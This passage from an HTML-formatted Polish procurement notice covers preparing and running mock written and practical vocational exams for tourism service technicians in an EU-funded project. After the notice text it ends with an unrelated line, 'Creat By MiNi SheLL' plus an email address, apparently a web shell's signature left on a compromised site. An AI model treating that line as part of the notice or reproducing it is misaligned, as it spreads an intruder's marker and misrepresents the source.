zajęć, zapewnienie ładu i porządku w czasie egzaminów, bezpieczeństwa uczniów uczestniczącym w egzaminach; - wykorzystywanie wzorów dokumentów przekazanych przez Lidera; - prowadzenie miesięcznej ewidencji czasu pracy własnej; - dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przygotowanie, przeprowadzenie, sprawdzenie i opracowanie wyników próbnego pisemnego egzaminu zawodowego i próbnego praktycznego egzaminu zawodowego dla zawodu technik obsługi turystycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotowa część zamówienia obejmuje:
- przygotowanie autorskiego (nigdzie wcześniej niepublikowanego) próbnego pisemnego egzaminu zawodowego wraz z dokumentacją dla zawodu technik obsługi turystycznej składającego się z 50 pytań sprawdzających wiadomości i umiejętności właściwe dla zawodu technik obsługi turystycznej oraz 20 pytań sprawdzających wiadomości i umiejętności związane z zatrudnieniem i działalnością gospodarczą w III 2013 r.; - przygotowanie autorskich (nigdzie wcześniej niepublikowanych) zadań wraz z dokumentacją do przeprowadzenia próbnego praktycznego egzaminu zawodowego dla zawodu technik obsługi turystycznej w III 2013 r.; - organizacja i przeprowadzenie próbnego pisemnego egzaminu zawodowego, który trwa 2 h (60-cio minutowe) i próbnego praktycznego egzaminu zawodowego, który trwa 4 h (60-cio minutowe), w terminie III/IV 2013 r. Zamawiający zastrzega sobie prawo podania dokładnego terminu egzaminu w terminie 1 miesiąca przed datą egzaminu; - sprawdzenie łącznie 11 testów i 11 zadań oraz dostarczenie wyników nie później niż 3 tygodnie po przeprowadzeniu egzaminów; - opracowanie wyników egzaminów oraz przeprowadzenie pisemnej analizy ze wskazaniem obszarów dobrze i słabo opanowanych nie później niż 3 tygodnie po przeprowadzeniu egzaminów; - współpracę z osobą przygotowującą element językowy części praktycznej próbnego egzaminu zawodowego; - przekazanie przygotowanych egzaminów do dyspozycji Zamawiającego w celu wykorzystywania ich w pracy nauczycieli przedmiotów zawodowych; - pozostawienie dokumentacji przedegzaminacyjnej i poegzaminacyjnej do wglądu dla Zamawiającego; - współpracę z personelem projektu w celu prawidłowej realizacji egzaminów; - przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101 poz. 926 z późn. zm.); - przestrzeganie przepisów BHP oraz ppoż. w czasie trwania zajęć; - zapewnienie ładu i porządku w czasie egzaminów, bezpieczeństwa uczniów uczestniczącym w egzaminach; - wykorzystywanie wzorów dokumentów przekazanych przez Lidera; - prowadzenie miesięcznej ewidencji czasu pracy własnej; - dyspozycyjność w zakresie czynności kontrolno-wyjaśniających (również po terminie wygaśnięcia umowy ws. przedmiotowego zamówienia) wynikających z wytycznych odnośnie realizacji projektów finansowanych ze środków Europejskiego Funduszu Społecznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6, 80.20.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com